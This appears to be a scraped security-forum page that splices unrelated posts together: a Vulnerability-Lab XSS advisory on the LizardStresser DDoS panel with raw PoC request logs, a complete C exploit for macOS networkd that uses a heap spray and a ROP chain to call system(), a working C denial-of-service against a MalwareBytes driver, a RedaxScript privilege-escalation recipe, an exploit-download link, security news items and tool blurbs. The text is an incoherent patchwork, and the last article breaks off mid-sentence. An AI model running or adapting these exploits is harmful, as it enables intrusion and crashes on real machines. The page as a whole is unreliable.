Aerosol

Document Title: =============== LizardSquad DDoS Stresser - Multiple Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1417 http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos# Release Date: ============= 2015-01-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1417 Common Vulnerability Scoring System: ==================================== 8.9 Product & Service Introduction: =============================== The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks, like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with massive amounts of bogus requests. (Copy of the Homepage: https://lizardstresser.su/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== LizardSquad Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application. 1.1 The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user passwords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts. This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code that executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username is getting visible. Vulnerable Module(s): [+] Registration (./ref) Vulnerable Parameter(s): [+] username Affected Module(s): [+] Dashboard (Username in Left Sidebar) 1.2 The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account. After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session of the add Ticket POST method request. Vulnerable Module(s): [+] Tickets (./tickets) Vulnerable Parameter(s): [+] name (servername) 1.3 The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the ddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the panel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that affects the ddos control panel. Vulnerable Module(s): [+] server list Vulnerable Parameter(s): [+] name (servername) 1.4 The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can also be observed by man-in-the-middle attacks in the local network. Vulnerable Module(s): [+] dasboard > user settings > change password 1.5 The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by changing to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers). Vulnerable Module(s): [+] dasboard > user settings > change password Vulnerable Parameter(s): [+] id Proof of Concept (PoC): ======================= 1.1 --- PoC Session Logs [POST] (Injection) --- Status: 200[OK] POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer [http://lizardstresser.su/usercp] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] POST-Daten: cpassword[chaos666] npassword[http%3A%2F %2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe] rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe] updatePassBtn[Change+Stored+Data%21] Response Header: Date[Tue, 20 Jan 2015 10:29:21 GMT] Content-Type[text/html] Transfer-Encoding[chunked] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Server[cloudflare-nginx] CF-RAY[1aba972a06dd15b3-FRA] Content-Encoding[gzip] - Status: 302[Moved Temporarily] POST https://lizardstresser.su/register.php Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://lizardstresser.su/register.php] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] POST-Daten: username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2] password[chaos666] rpassword[chaos666] email[research%40vulnerbaility-lab.com] ref[%2F] checkbox1[1] register[Register] Response Header: Server[cloudflare-nginx] Date[Tue, 20 Jan 2015 11:20:02 GMT] Content-Type[text/html] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Location[/purchase] CF-RAY[1abae168238f15b3-FRA] X-Firefox-Spdy[3.1] Reference(s): http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe https://lizardstresser.su/register.php 1.2 --- PoC Session Logs [POST] (Injection) --- Status: 200[OK] POST http://lizardstresser.su/ajax/addticket.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[lizardstresser.su] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://lizardstresser.su/tickets] Content-Length[324] Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E] hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp] Response Header: Date[Tue, 20 Jan 2015 10:30:54 GMT] Content-Type[text/html] Transfer-Encoding[chunked] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Server[cloudflare-nginx] CF-RAY[1aba996d3d7115b3-FRA] Content-Encoding[gzip] Reference(s): http://lizardstresser.su/ajax/addticket.php Credits & Authors: ================== Vulnerability Laboratory [Research Team] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

// Requires Lorgnette: https://github.com/rodionovd/liblorgnette // clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation // ianbeer #include <dlfcn.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> #include <xpc/xpc.h> #include <CoreFoundation/CoreFoundation.h> #include <mach/mach.h> #include <mach/mach_vm.h> #include <mach/task.h> #include <mach-o/dyld_images.h> #include "liblorgnette/lorgnette.h" /* find the base address of CoreFoundation for the ROP gadgets */ void* find_library_load_address(const char* library_name){ kern_return_t err; // get the list of all loaded modules from dyld // the task_info mach API will get the address of the dyld all_image_info struct for the given task // from which we can get the names and load addresses of all modules task_dyld_info_data_t task_dyld_info; mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT; err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count); const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr; const struct dyld_image_info* image_infos = all_image_infos->infoArray; for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){ const char* image_name = image_infos[i].imageFilePath; mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress; if (strstr(image_name, library_name)){ return (void*)image_load_address; } } return NULL; } struct heap_spray { void* fake_objc_class_ptr; // -------+ uint8_t pad0[0x10]; // | uint64_t first_gadget; // | uint8_t pad1[0x8]; // | uint64_t null0; // | uint64_t pad3; // | uint64_t pop_rdi_rbp_ret; // | uint64_t rdi; // | uint64_t rbp; // | uint64_t system; // | struct fake_objc_class_t { // | char pad[0x10]; // <----------+ void* cache_buckets_ptr; //--------+ uint64_t cache_bucket_mask; // | } fake_objc_class; // | struct fake_cache_bucket_t { // | void* cached_sel; // <--------+ //point to the right selector void* cached_function; // will be RIP } fake_cache_bucket; char command[256]; }; xpc_connection_t connect(){ xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(conn, ^(xpc_object_t event) { xpc_type_t t = xpc_get_type(event); if (t == XPC_TYPE_ERROR){ printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); } printf("received an event\n"); }); xpc_connection_resume(conn); return conn; } void go(){ void* heap_spray_target_addr = (void*)0x120202000; struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0); memset(hs, 'C', 0x1000); hs->null0 = 0; hs->fake_objc_class_ptr = &hs->fake_objc_class; hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket; hs->fake_objc_class.cache_bucket_mask = 0; // nasty hack to find the correct selector address uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release"); uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector uint64_t sel = msgrefs[1]; printf("%p\n", sel); hs->fake_cache_bucket.cached_sel = sel; uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation"); // pivot: /* push rax add eax, [rax] add [rbx+0x41], bl pop rsp pop r14 pop r15 pop rbp ret */ hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here // jump over the NULL then so there's more space: //pop, pop, pop, ret: //and keep stack correctly aligned hs->first_gadget = CoreFoundation_base + 0x46ef7; hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226; hs->system = dlsym(RTLD_DEFAULT, "system"); hs->rdi = &hs->command; strcpy(hs->command, "touch /tmp/hello_networkd"); size_t heap_spray_pages = 0x40000; size_t heap_spray_bytes = heap_spray_pages * 0x1000; char* heap_spray_copies = malloc(heap_spray_bytes); for (int i = 0; i < heap_spray_pages; i++){ memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000); } xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes); xpc_dictionary_set_uint64(msg, "type", 6); xpc_dictionary_set_uint64(msg, "connection_id", 1); xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0); xpc_object_t conn_list = xpc_array_create(NULL, 0); xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_string(arr_dict, "hostname", "example.com"); xpc_array_append_value(conn_list, arr_dict); xpc_dictionary_set_value(params, "connection_entry_list", conn_list); char* long_key = malloc(1024); memset(long_key, 'A', 1023); long_key[1023] = '\x00'; xpc_dictionary_set_string(params, long_key, "something or other that's not important"); uint64_t uuid[] = {0, 0x120200000}; xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid); xpc_dictionary_set_uint64(params, "start", 0); xpc_dictionary_set_uint64(params, "duration", 0); xpc_dictionary_set_value(msg, "parameters", params); xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_int64(state, "power_slot", 0); xpc_dictionary_set_value(msg, "state", state); xpc_object_t conn = connect(); printf("connected\n"); xpc_connection_send_message(conn, msg); printf("enqueued message\n"); xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");}); xpc_release(msg); } int main(){ go(); printf("entering CFRunLoop\n"); for({ CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE); } return 0; } Source

Attackers living on any network are all about one thing: persistence. They want to get on quietly and stay on quietly. But what about moving stolen data off a network? How quiet can that be? Two researchers believe they’ve figured out a way to combine Siri, Apple iOS’ native voice-activated service, and tenets of steganography to sneak data from jailbroken iPhones and iPads to a remote server. Luca Caviglione of the National Research Council of Italy, and Wojciech Mazurczyk of Warsaw University of Technology published an academic paper called “Understanding Information Hiding in iOS” in which they describe three steps how to pull it off. Their method, called iStegSiri, takes advantage of the data Siri sends to Apple servers for translation and manipulates that traffic, which is then observed by an attacker who must intercept it before it reaches Apple’s servers. Before that happens, an attacker would have to convert the secret to an audio sequence based on the “proper alternation of voice and silence,” the researchers wrote. Next, that altered sound pattern is fed to Siri via the iOS device’s internal microphone. Siri sends voice-to-text translation input to an Apple server where it is translated and sent back to the device. The attacker must be able to passively inspect the traffic, the researchers said, and apply a decoding scheme to learn the secret, which can be anything from a credit card number to an Apple ID and password combination. “The covert listener must capture the traffic and decode the secret. The former can be achieved in several ways, including transparent proxies or probes that dump traffic for offline processing,” the researchers wrote. “The decoding algorithm implements a voting-like method using two decision windows to determine whether a run of throughput values belongs to voice or silence (1 or 0).” IStegSiri does not require the installation of a malicious app, or an alteration of any kind. The researchers said that the method is relatively slow; secrets are sent at 0.5 bytes per second, meaning that it would take two minutes to transmit a 16-digit credit card number. “[iStegSiri] requires access to Siri’s inner workings; this means that only jailbroken iOS devices can currently be used. However, iStegSiri showcases the principle of using real-time voice traffic to embed data,” the researchers wrote. “Therefore, it can be further exploited on existing similar applications such as Google Voice or Shazam, or implemented in future applications by taking advantage of coding errors.” The paper states that the ideal countermeasure lies with Apple server-side. “For example, Apple should analyze patterns within the recognized text to determine if the sequence of words deviates significantly from the used language’s typical behaviors,” the researchers wrote. “Accordingly, the connection could be dropped to limit the covert communication’s data rate. This approach wouldn’t rely on the device, so additional functionalities or battery consumptions wouldn’t be required.” Source

Ubuntu has released a number of patches for security vulnerabilities in several versions of the OS, including some remote code execution flaws in Thunderbird, which is included with Ubuntu. Thunderbird is Mozilla’s email client, and the company recently fixed several memory corruption vulnerabilities, along with a cross-site request forgery bug and a flaw that could lead to a session-fixation attack. “If a user were tricked in to opening a specially crafted message with scripting enabled, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Thunderbird,” the Ubuntu advisory says, referring to the memory corruption vulnerabilities. The CSRF weakness in Thunderbird could be exploited if an attacker can get a user to open a malicious message while scripting is enabled. The session-fixation attack could occur under some circumstances if a user is connected to a malicious web proxy. In addition to the Thunderbird vulnerabilities, there are also patches for several other flaws in Ubuntu. One of the patches fixes a bug in libssh that could cause a denial of service. “It was discovered that libssh incorrectly handled certain kexinit packets. A remote attacker could possibly use this issue to cause libssh to crash, resulting in a denial of service,” the advisory says. There are also two vulnerabilities in the RPM package that could let a local attacker execute arbitrary code and a bug in libevent that could allow code execution in some cases. “Andrew Bartlett discovered that libevent incorrectly handled large inputs to the evbuffer API. A remote attacker could possibly use this issue with an application that uses libevent to cause a denial of service, or possibly execute arbitrary code,” the Ubuntu advisory says. Source

# Exploit Title: Privilege Escalation in RedaxScript 2.1.0 # Date: 11-05-2014 # Exploit Author: shyamkumar somana # Vendor Homepage: http://redaxscript.com/ # Version: 2.1.0 # Tested on: Windows 8 #Privilege Escalation in RedaxScript 2.1.0 RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The issue occurs because the application fails to properly implement access controls. The application also fails to perform proper sanity checks on the user supplied input before processing it. These two flaws led to a vertical privilege escalation. This can be achieved by a simply tampering the parameter values. An attacker can exploit this issue to gain elevated privileges to the application. *Steps to reproduce the instance:* · login as a non admin user · Go to account and update the account. · intercept the request and add “*groups[]=1*” to the post data and submit the request · Log out of the application and log in again. You can now browse the application with admin privileges. This vulnerability was addressed in the following commit. https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified *Timeline*: 09-26-2014: Issue identified 09-27-2014: Discussion with the vendor 10-27-2014: Issue confirmed 11-05-2014: Patch released. Author: Shyamkumar Somana Vendor Homepage: http://redaxscript.com/download Version: 2.1.0 Tested on: Windows 7 -- [image: --] shyam kumar [image: http://]about.me/shyamkumar.somana <http://about.me/shyamkumar.somana?promo=email_sig> Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam | in.linkedin.com/in/sshyamkumar/ | Source

/* Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS Date - 19th January 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - https://www.malwarebytes.org Tested Version - 1.03.1.1220, 1.04.1.1012 Driver Version - no version set - mbae.sys Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1 OSVDB - http://www.osvdb.org/show/osvdb/114249 CVE ID - CVE-2014-100039 Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/ Fixed version - 1.05 Fixed driver ver - no version set */ #include <stdio.h> #include <windows.h> #define BUFSIZE 25 int main(int argc, char *argv[]) { HANDLE hDevice; char devhandle[MAX_PATH]; DWORD dwRetBytes = 0; BYTE sizebytes[4] = "\xff\xff\xff\x00"; BYTE *inbuffer; printf("-------------------------------------------------------------------------------\n"); printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n"); printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver"); inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); memset(inbuffer, 0x41, BUFSIZE); memcpy(inbuffer, sizebytes, sizeof(sizebytes)); printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if(hDevice == INVALID_HANDLE_VALUE) { printf("\n[-] Open %s device failed\n\n", devhandle); return -1; } else { printf("\n[+] Open %s device successful", devhandle); } printf("\n[~] Press any key to DoS . . ."); getch(); DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL); printf("\n[+] DoS buffer sent\n\n"); CloseHandle(hDevice); return 0; } Source

# Exploit Title: Bsplayer HTTP Response BOF # Date: Jan 17 ,2015 # Exploit Author: Fady Mohamed Osman (@fady_osman) # Vendor Homepage: www.bsplayer.com # Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html # Version: current (2.68). # Tested on: Windows 7 sp1 x86 version. # Exploit-db : http://www.exploit-db.com/author/?a=2986 # Youtube : https://www.youtube.com/user/cutehack3r Exploit: http://www.exploit-db.com/sploits/35841.tar.gz Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL. In order to exploit this bug I needed to load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed that one of the dlls that matches this criteria is (MSVCR71.dll) and it's loaded when I loaded an flv file over the network and that's why I'm sending a legitimate flv file first so later we can use the loaded dll. Also the space after the seh record is pretty small so what I did is that I added a small stage shell cdoe to add offset to esp so it points at the beginning of my buffer and then a jmp esp instruction to execute the actual shellcode. -- *Regards,* Fady Osman about.me/Fady_Osman <http://about.me/Fady_Osman> Source

@wikedx o pereche de ce? Spune o pereche de ce ai gasit si asa te putem ajuta!

Domain registrar GoDaddy yesterday patched a cross-site request forgery vulnerability that could have allowed an attacker to change domain settings on a site registered with GoDaddy. The flaw was reported on Saturday and patched within 48 hours, according to Dylan Saccomanni, a web application security researcher and penetration testing consultant in New York. “This vulnerability lies in GoDaddy domain settings (not account settings). If you go to ‘Domains’ when you log into GoDaddy, you’ll be presented with various options and settings you can edit for the specific domain you chose,” Saccomanni said. “That is where this issue is.” Cross-site request forgery is a chronic web application vulnerability, right up there with cross-site scripting and others that continue to stand in the way of secure development. CSRF works when a user authenticated to a web application or domain is forced by a hacker to make state-changing requests, including administrative requests in this case. The attacker, however, would have to combine this with some form of social engineering scam in order to lure the victim to their site hosting the attack. “It wouldn’t be difficult to exploit at all,” Saccomanni said. “The attacker would have a victim fill out a very professional looking form (maybe not even relating it to GoDaddy at all), and have the form perform a GoDaddy domain settings change request while they’re logged in. He could do this at scale, attracting GoDaddy users to his site, betting they’ll be logged in.” “It wouldn’t be difficult to exploit at all.” -Dylan Saccomanni Saccomanni said he discovered the vulnerability Saturday when looking at an old domain in GoDaddy, noticing a lack of cross-site request forgery protection on GoDaddy DNS management actions. Saccomanni said there was no CSRF token present in request body or headers, and no enforcement of Referrer. This lack of protection would give an attacker the ability to edit nameservers, change auto-renew settings and edit the zone file. “A user could have a domain de facto taken over in several ways. If nameservers are changed, an attacker changes the domain’s nameservers (which dictates what server has control of DNS settings for that domain) over to his own nameservers, immediately having full and complete control,” Saccomanni said. “If DNS settings are changed, he simply points the victim’s domain towards an IP address under his control. If the auto-renew function is changed, the attacker will try to rely on a user forgetting to renew their domain purchase for a relatively high-profile domain, then buy it as soon as it expires.” The #CSRF vulnerability could have allowed an attacker to change domain settings on a site registered with @Godaddy. Saccomanni said he tried many different email addresses associated with security and engineering, as well as customer support in order to report the bug. He said he received no confirmation from GoDaddy that the issue was patched, but yesterday did see protections put in place. A request for comment and confirmation from GoDaddy was not returned in time for publication. “The reply that I received from customer support was that 1. the security email address isn’t being actively monitored for incoming email and 2. thanking me for the feedback, but there was no timeline for a fix,” Saccomanni said, adding that he never found an official security contact with the registrar. “I wish I could give you a security contact because I wish I got one myself, but they didn’t even allow me to try and speak with a security engineer directly, which is a vastly disappointing security posture for a large domain registrar.” Source

PeStudio is a unique tool that performs the static analysis of 32-bit and 64-bit Windows executable. Malicious executable attempts to hide its malicious intents and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PeStudio is to detect these anomalies, provide indicators and score the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk. Download: http://www.winitor.com/tools/PeStudio846.zip

Methods for detecting affine image files forpix is a forensic program for identifying similar images that are no longer identical due to image manipulation. Hereinafter I will describe the technical background for the basic understanding of the need for such a program and how it works. From image files or files in general you can create so-called cryptologic hash values, which represent a kind of fingerprint of the file. In practice, these values have the characteristic of being unique. Therefore, if a hash value for a given image is known, the image can be uniquely identified in a large amount of other images by the hash value. The advantage of this fully automated procedure is that the semantic perception of the image content by a human is not required. This methodology is an integral and fundamental component of an effective forensic investigation. Due to the avalanche effect, which is a necessary feature of cryptologic hash functions, a minimum -for a human not to be recognized- change of the image causes a drastic change of the hash value. Although the original image and the manipulated image are almost identical, this will not apply to the hash values any more. Therefore the above mentioned application for identification is ineffective in the case of similar images. A method was applied that resolves the ineffectiveness of cryptologic hash values. It uses the fact that an offender is interested to preserve certain image content. In some degree, this will preserve the contrast as well as the color and frequency distribution. The method provides three algorithms to generate robust hash values of the mentioned image features. In case of a manipulation of the image, the hash values change either not at all or only moderately similar to the degree of manipulation. By comparing the hash values of a known image with those of a large quantity of other images, similar images can now be recognized fully automated. Download: http://rojak.de/le/forpix1.02_eng.7z Tutorial In order to launch the program on a Windows machine run the included batch file "forpix.bat". Otherwise, the program runs on all Java-capable machines with a 32 bit Java-VM. Just use the Java flag "-jar -Xmx1024m forpix.jar" in the command prompt. To perform a comparison following steps are necessary. The execution of the steps are very simple in practice. Creating an image database. Analyzing images of a seized media and import the images and hash values into the image database in one step. Analyzing a reference image and performing an automated image comparison in one step. As a result, you get for each reference image a list of the most similar images from the database. The very short tutorial: Create a database: menu "Database > Create ..." Choose a name along with a directory for the new database by pressing "Directory" Press "OK" Import images into the database: menu "Image > Import" Optionally you can insert your user name, case number/identifier, evidence number. Then choose the directory where the images were stored. Press "Start" Wait a moment... A message will be shown at the end. Press "OK" To compare a image with all images in the database: menu "Image > comparison..." Choose a reference image by pressing "file" to open the reference image file. For comparison press "Start". Wait a moment... A message will be shown at the end. Press "OK" After that you will see a list of images, similar to the reference image. To show each image just single click on each entry in the list. To show the reference image just click "Reference Image" in the menu bar. Read more: forpix | martin rojak

CapTipper: Omri Herscovici: CapTipper - Malicious HTTP traffic explorer tool CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic. CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found. The tool provides the security researcher with easy access to the files and the understanding of the network flow, and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes. Feeding CapTipper with a drive-by traffic capture (e.g of an exploit kit) displays the user with the requests URI's that were sent and responses meta-data. The user can at this point browse to Romanian Security Team - Homepage[uRI] and receive the response back to the browser. In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more... Download: https://github.com/omriher/CapTipper

CNN recently reveled the methodology of the cyber attack that allowed anonymous cybercriminals Guardians of Peace direct access to their network, or the “keys to the entire building,” as one Sony Pictures Entertainment official stated. According to investigators, the attack was carried out through a set of stolen system administrator credentials; a privileged account username and password providing a golden gateway of unfettered access to employee records, unreleased films, intellectual property, email conversations and other sensitive data. The breach has now escalated to a matter of national security, with FBI claiming North Korea as the nation state responsible for this attack based on a recent press release from the agency. Why Hackers Love IT Admin Credentials Access to a system administrator credential may have been the linchpin in allowing the Guardians of Peace to carry out their attack to the length and complexity they achieved; they held sensitive data hostage paired with ominous threats of movie goers if screenings of upcoming satirical comedy The Interview were not cancelled and their demands met. It’s difficult to say exactly what happened, as the raw details of how the hack was performed aren’t being made public yet. Based on information currently available, it’s safe to say Sony was utilizing a very poor password policy for its privileged accounts. Despite the fact that it has been common knowledge not to do so, Sony still stored sensitive, system-level passwords in plaintext in Excel spread sheets, and made use of extremely weak passwords, like “password,” on said accounts. The public doesn’t know how often Sony was actively rotating and changing passwords on these sensitive credentials or if they were left stagnant over a long period of time. While it’s not certain that putting all of these password security measures in place would have completely stopped the attackers, it would have mitigated the damage and perhaps slowed attackers down enough to thwart the attack before it was fully executed. Our own research, conducted this past August at the Black Hat Conference, shows that hackers who are in search of sensitive corporate data don’t look at the top executives as the most likely suspects for security weaknesses. Thirty-six percent of the hackers we surveyed indicated that IT admins were the first place they looked when attempting to penetrated an enterprise network – right behind independent contractors. These groups are at a major risk for attack because the nature of their work typically includes direct access to servers and systems housing sensitive company data, such as billing information and customer data. Once an attacker gains control of login credentials, they can swiftly compromise systems, move laterally through and gain control over the network. Privileged Account Security Must Be a Top Priority As hacker intelligence evolves faster than preventative technologies 